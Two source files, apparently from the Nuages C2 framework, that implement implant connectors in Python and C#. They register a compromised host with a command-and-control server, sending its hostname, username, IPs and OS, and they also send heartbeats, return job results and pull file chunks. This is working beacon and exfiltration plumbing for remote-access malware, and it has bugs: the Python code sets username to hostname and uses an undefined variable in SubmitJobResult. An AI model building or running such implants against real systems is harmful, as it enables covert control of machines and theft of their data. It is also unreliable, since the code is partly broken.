File: Api/Implants/Python/NuagesDirectConnector.py
import requests
import json

class NuagesC2Direct:
  def __init__(self, connectionString):
    self.connectionString = connectionString
    self.handler = "Direct"

  def getConnectionString(self):
    return self.connectionString
  
  def getHandler(self):
    return self.handler

  def POST(self, url, body):
    headers = {'Content-type': 'application/json'}
    response = requests.post(self.connectionString + url, data = body, verify=True, headers=headers)
    if(response.ok):
      return json.loads(response.content)
    else:
        response.raise_for_status()
  
  def RegisterImplant(self, hostname = "", username = "",  localIp = "", sourceIp = "", os = "", handler = "", connectionString = "", options = {}, supportedPayloads = []):
    implant = {}
    implant['hostname'] = hostname
    implant['username'] = hostname
    implant['localIp'] = localIp
    implant['sourceIp'] = sourceIp
    implant['os'] = os
    implant['handler'] = handler
    implant['connectionString'] = connectionString
    implant['options'] = options
    implant['supportedPayloads'] = supportedPayloads
    jsonData  = self.POST("/implant/register", json.dumps(implant))
    return jsonData["_id"]

  def Heartbeat(self, implantId):
      body = {}
      body['id'] = implantId
      jsonData  = self.POST("/implant/heartbeat", json.dumps(body))
      return jsonData["data"]

  def SubmitJobResult(self, jobId, result = "", moreData = False, error = False, n = 0, data = ""):
      body = {}
      body['id'] = implantId
      body['result'] = result
      body['moreData'] = moreData
      body['error'] = error
      body['data'] = data
      body['n'] = n
      self.POST("/implant/jobresult", json.dumps(body))

  def GetFileChunk(self, fileId, n):
      body = {}
      body['n'] = n
      body['file_id'] = fileId
      jsonData  = self.POST("/implant/chunks", json.dumps(body))
      return jsonData["data"]

File: Api/Implants/C#/NuagesDirectConnector.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using Newtonsoft.Json.Linq;

namespace NuagesC2Direct
{
    public interface NuagesC2Connector
    {
        string getConnectionString();

        string getHandler();

        string RegisterImplant(string hostname = "", string username = "", string localIp = "", string sourceIp = "", string os = "", string handler = "", string connectionString = "", Dictionary<string, string> options = null, String[] supportedPayloads = null);

        void SubmitJobResult(string jobId, string result = "", bool moreData = false, bool error = false, int n = 0, string data = "");

        JArray Heartbeat(string implantId);

        string GetFileChunk(string fileId, int n);

    }

    public class NuagesC2Direct: NuagesC2Connector
    {
        private string connectionString;

        private string handler = "Direct";

        public NuagesC2Direct(string connectionString)
        {
            this.connectionString = connectionString;
        }

        public string getConnectionString() {
            return this.connectionString;
        }

        public string getHandler()
        {
            return this.handler;
        }

        string POST(string url, string jsonContent)
        {
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
            request.Method = "POST";

            System.Text.UTF8Encoding encoding = new System.Text.UTF8Encoding();
            Byte[] byteArray = encoding.GetBytes(jsonContent);

            request.ContentLength = byteArray.Length;
            request.ContentType = @"application/json";

            using (Stream dataStream = request.GetRequestStream())
            {
                dataStream.Write(byteArray, 0, byteArray.Length);
            }
            
            using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
            {
                using (Stream responseStream = response.GetResponseStream())
                {
                    StreamReader reader = new StreamReader(responseStream, System.Text.Encoding.GetEncoding("utf-8"));
                    return reader.ReadToEnd();
                }
            }
        }
        public void SubmitJobResult(string jobId, string result = "", bool moreData = false, bool error = false, int n = 0, string data = "")
        {
            JObject body = new JObject(
                new JProperty("n", n),
                new JProperty("moreData", moreData),
                new JProperty("error", error),
                new JProperty("result", result),
                new JProperty("jobId", jobId),
                new JProperty("data", data)
            );
            this.POST(this.connectionString + "/implant/jobresult", body.ToString());
        }

        public string RegisterImplant(string hostname = "", string username = "",  string localIp = "", string sourceIp = "", string os = "", string handler = "", string connectionString = "", Dictionary<string, string> options = null, String[] supportedPayloads = null)
        {
            JObject body = new JObject(
                new JProperty("hostname", hostname),
                new JProperty("username", username),
                new JProperty("localIp", localIp),
                new JProperty("sourceIp", sourceIp),
                new JProperty("os", os),
                new JProperty("handler", handler),
                new JProperty("connectionString", connectionString),
                new JProperty("options", JObject.FromObject(options)),
                new JProperty("supportedPayloads", JArray.FromObject(supportedPayloads))
            );
            JObject response = JObject.Parse(this.POST(this.connectionString + "/implant/register", body.ToString()));
            return response["_id"].ToString();
        }

        public JArray Heartbeat(string implantId) {
            JObject body = new JObject(
                new JProperty("id", implantId)
            );
            JObject response = JObject.Parse(this.POST(this.connectionString + "/implant/heartbeat", body.ToString()));
            return (JArray)response["data"];
        }

        public string GetFileChunk(string fileId, int n) {
            JObject body = new JObject(
                new JProperty("n", n),
                new JProperty("file_id", fileId)
            );

            JObject response = JObject.Parse(this.POST(this.connectionString + "/implant/chunks", body.ToString()));
            try
            {
                return response["data"].ToString();
            }
            catch {
                return "";
            }
        }
    }

}
